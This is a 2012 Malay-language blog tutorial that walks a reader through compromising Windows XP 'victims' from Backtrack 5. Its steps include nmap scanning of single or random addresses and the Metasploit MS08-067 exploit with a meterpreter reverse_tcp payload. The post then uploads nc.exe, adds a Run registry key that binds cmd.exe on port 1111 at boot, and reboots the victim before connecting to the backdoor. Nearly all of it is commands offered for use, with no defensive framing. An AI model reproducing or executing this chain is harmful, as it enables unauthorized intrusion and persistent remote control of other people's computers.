Monthly Archives: May 2012

Exploit nc.exe Backtrack 5

Posted on by
Reply

1. Buka terminal di Backtrack dan taip

Code:

# cp /pentest/windows-binaries/tools/nc.exe /root/Desktop/

Secara automaticnya di Desktop Backtrack anda akan muncul satu fail nc.exe

2. Kemudian buka terminal baru (New Tab), taipkan kata arahan NMap IP Address mangsa untuk melihat OS yang digunakan

Code:

# nmap -sS -O [IP_MANGSA]

kata arahan diatas digunakan jika anda mempunyai IP Address Mangsa anda

Code:

# nmap -sS -O 192.168.1.1-255

kata arahan diatas digunakan jika anda ingin mencari mangsa secara rawak

Quote:Untuk tutorial ini, anda memerlukan mangsa yang menggunakan OS Microsoft Windows XP sahaja!
3. Setelah anda mempunyai mangsa, buka metasploit di terminal baru anda

Code:

# msfconsole
4. Kemudian taipkan kata arahan dibawah

Code:

> use exploit/windows/smb/ms08_067_netapi

Code:

> set payload windows/meterpreter/reverse_tcp

Code:

> set LHOST [IP_anda]

Code:

> set RHOST [IP_mangsa]

Code:

> exploit
5. Biarkan ianya running sehinggalah anda berjaya mendapatkan SESSION mangsa. Anda berjaya mendapatkan SESSION mangsa apabila satu kata arahan keluar iaitu

Code:

meterpreter >
6. Setelah itu, taipkan kata arahan dibawah untuk memasukkan Backdoor nc.exe tadi ke dalam komputer mangsa

Code:

> upload /root/Desktop/nc.exe c:\\WINDOWS\\system32\\
7. Setelah proses muat naik selesai, sekarang ada proses untuk menyemak registry komputer mangsa

Code:

> reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RUN

 

Quote:Proses ini juga untuk menjalankan Backdoor tadi setiap kali mangsa membuka komputer
8. Sekarang adalah proses untuk mendaftar backdoor nc.exe tadi ke registry komputer mangsa

Code:

> reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RUN -v BACKDOOR -d c:\\WINDOWS\\system32\\nc.exe” -: -d -p 1111 -e cmd.exe”
9. Sekarang pula adalah proses untuk menyemak backdoor yang telah dimasukkan ke registry mangsa

Code:

> reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run

 

Quote:Anda akan mendapati Backdoor anda telah pon berada pada registry komputer mangsa
10. Reboot komputer mangsa

Code:

> reboot
11. Setelah komputer mangsa direboot, kini masanya untuk membuat penyambungan ke komputer mangsa dengan hanya menggunakan Backdoor kita tadi. Buka terminal anda dan taipkan kata arahan dibawah

Code:

# nc [IP_MANGSA] 1111
12. DONE! kini anda telah berada di System komputer mangsa.

 

download file nya disini Universitas Bina Darma Exploit nc-exe Backtrack 5

:iloveindonesia